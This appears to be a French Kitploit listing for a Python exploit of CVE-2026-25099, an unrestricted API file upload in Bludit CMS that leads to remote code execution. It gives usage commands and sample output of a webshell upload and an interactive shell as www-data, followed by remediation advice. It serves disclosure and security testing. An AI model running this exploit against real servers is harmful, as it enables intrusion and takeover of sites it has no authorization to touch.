Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-25099 — Exploit Python pour le téléversement de fichier non restreint de l'API du CMS Bludit menant à une exécution de code à distance, offrant l'exécution de commandes et un shell interactif pour les tests autorisés. | Kitploit
Outils/GitHubGitHub/yahiahamza/cve-2026-25099
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubyahiahamza/cve-2026-25099

CVE-2026-25099

Exploit Python pour le téléversement de fichier non restreint de l'API du CMS Bludit menant à une exécution de code à distance, offrant l'exécution de commandes et un shell interactif pour les tests autorisés.

Voir le dépôt
3il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-25099 - Bludit CMS API Téléversement de fichier sans restriction vers RCE

Description

Les versions de Bludit CMS antérieures à 3.18.4 permettent à un attaquant authentifié disposant d'un jeton API valide de téléverser des fichiers de tout type et extension via le point de terminaison POST /api/files/<page-key>. La fonction uploadFile() n'effectue aucune validation d'extension ou de contenu de fichier, permettant le téléversement et l'exécution de webshells PHP en tant que www-data.

Versions concernées

  • Vulnérables : Bludit < 3.18.4
  • Corrigées : Bludit 3.18.4
  • Prérequis : Jeton API valide (visible dans le panneau d'administration sous Plugins → API)

Utilisation

root@kitploit:~
# Exécution d'une commande unique
python3 CVE-2026-25099.py -u http://cible -t "JETON_API" -c "id"

# Shell interactif
python3 CVE-2026-25099.py -u http://cible -t "JETON_API"

Exemple de sortie

root@kitploit:~
[*] CVE-2026-25099 - Bludit CMS API Téléversement de fichier vers RCE
[*] Cible : http://cible
[*] Récupération de la clé de page...
[+] Clé de page : create-your-own-content
[*] Téléversement du webshell...
[+] Shell téléversé : http://cible/bl-content/uploads/pages/create-your-own-content/abcdefgh.php
[*] Vérification de la RCE...
[+] RCE confirmée : uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Shell interactif (tapez 'exit' pour quitter)

shell> whoami
www-data
shell> grep BLUDIT_VERSION /var/www/html/bl-kernel/boot/init.php
define('BLUDIT_VERSION', '3.18.2');

Captures d'écran

Exécution du PoC

Remédiation

  • Mettre à jour vers Bludit 3.18.4 ou une version ultérieure
  • Désactiver le plugin API s'il n'est pas nécessaire
  • Surveiller /bl-content/uploads/ pour détecter des fichiers PHP inattendus

Références

  • CVE-2026-25099 sur MITRE
  • Analyse technique - yh.do

Auteur

Yahia Hamza - https://yh.do

Avertissement

Cet outil est fourni uniquement à des fins de tests de sécurité autorisés et à des fins éducatives. Utilisez-le de manière responsable et uniquement contre des systèmes pour lesquels vous avez la permission de tester.

Télécharger l’outil